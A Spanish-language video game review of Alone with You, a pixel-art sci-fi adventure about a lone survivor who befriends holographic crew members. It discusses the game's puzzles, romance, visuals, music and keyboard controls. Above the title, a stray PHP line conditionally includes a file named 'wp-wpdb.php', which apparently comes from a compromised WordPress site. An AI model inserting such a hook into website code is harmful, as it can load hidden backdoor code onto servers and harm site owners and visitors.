if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Alone with You – La Fortaleza de LeChuck

Análisis Alone with You

Últimamente aparecen bastantes títulos que profundizan en el amor desde una perspectiva más virtual. En estas obras, podemos ver a humanos mostrando intereses románticos hacia inteligencias artificiales o androides. Partiendo de esta tendencia, Alone with You es una pequeña aventura que explora el amor virtual en medio de un planeta que ha sufrido un desastre.

Alone with You nos pone en la piel del último superviviente de una fallida expedición en un planeta lejano. El jugador, junto a una AI, debe apañárselas para poner a punto una nave que le llevará de vuelta a casa. Afortunadamente, cuenta con la inestimable ayuda de recreaciones holográficas de antiguos miembros de la expedición, quienes le facilitarán la tarea y proporcionarán ratos de distracción.

El planteamiento del juego es bien sencillo: tenemos que visitar las antiguas bases de investigación y recoger datos y piezas útiles para nuestro transporte. Por la noche, nuestro personaje se reunirá con los hologramas de científicos destacados para que le echen un cable.

Durante la aventura, el jugador interactuará con diferentes objetos dentro de las instalaciones para lograr reparar la nave de escape y, además, descubrir cómo han fallecido los diferentes profesionales. Será necesario escanear los objetos resaltados y resolver pequeños puzles que despejarán nuestras incógnitas. En cuanto a este último punto, los puzles que dispone el juego son la mar de sencillos. La mayoría se basan en encontrar contraseñas que están relacionadas con las pertenencias de los antiguos colonos.

Sin embargo, la magia reside en las interacciones sociales con los antiguos expertos que fallecieron debido al temporal que asoló la colonia. La tecnología de nuestra base hará que aparezcan en diferentes escenarios virtuales y serán tremendamente reales haciendo incluso que ellos mismos duden de si realmente murieron. La charla se dividirá entre el plano profesional y el personal, por lo tanto, el nivel de intimidad puede crecer con nuestras respuestas. Para ello, se nos darán tres opciones que van desde la contestación más amable a la pasiva o grosera.

Nuestros compañeros holográficos, Winnie, Jean, Pierre y Leslie, están dotados de personalidades muy variopintas. Es importante tener especial tacto al hablar de temas tan difíciles como su fallecimiento u objetos personales que encontremos. Lo curioso de nuestras interacciones con ellos es que no nos pondrán género, es decir, se dirigen a nosotros como «tú», lo que facilita que podamos acercamos a cualquiera de los cuatro. El nivel de afinidad que logremos está diseñado para que afecte al jugador y sea éste quien se decante por uno de los dos finales que dispone el juego.

Gráficamente, el título es puramente pixelart. La paleta de colores está compuesta de tonos apagados que encajan con la atmósfera de soledad e incertidumbre que vivimos como último superviviente en un planeta extraño. En cuanto a la música, no hay un gran abanico de temas pero han acertado en las melodías misteriosas dignas de una película de culto de los 80. El conjunto es muy agradable y vistoso, y entra rápidamente por la vista.

Alone with You no funciona con ratón, sino con los cursores o las habituales teclas WASD. ¡Hacía eones que no jugaba con los cursores! Posiblemente desde la época del MS-DOS, y de eso ha llovido ya. Es curioso como antes todos los juegos funcionaban con teclado o ratón, pero al irrumpir los polígonos y el 3D, teclado y ratón pasaron a trabajar juntos. Hoy en día, volver a recuperar los cursores que tanto uso le dimos en los 80 y 90 es casi entrañable.

Alone with You es un pequeña aventura con dosis de romance sci-fi pixelado. Durante unas 6 horas os adentraréis en instalaciones abandonadas y disfrutaréis de un poco de intimidad en un marco virtual. Sin duda, una buena propuesta para tener en cuenta siempre y cuando el inglés no sea un problema.

Disponible en PS Vita/PS4 y Steam.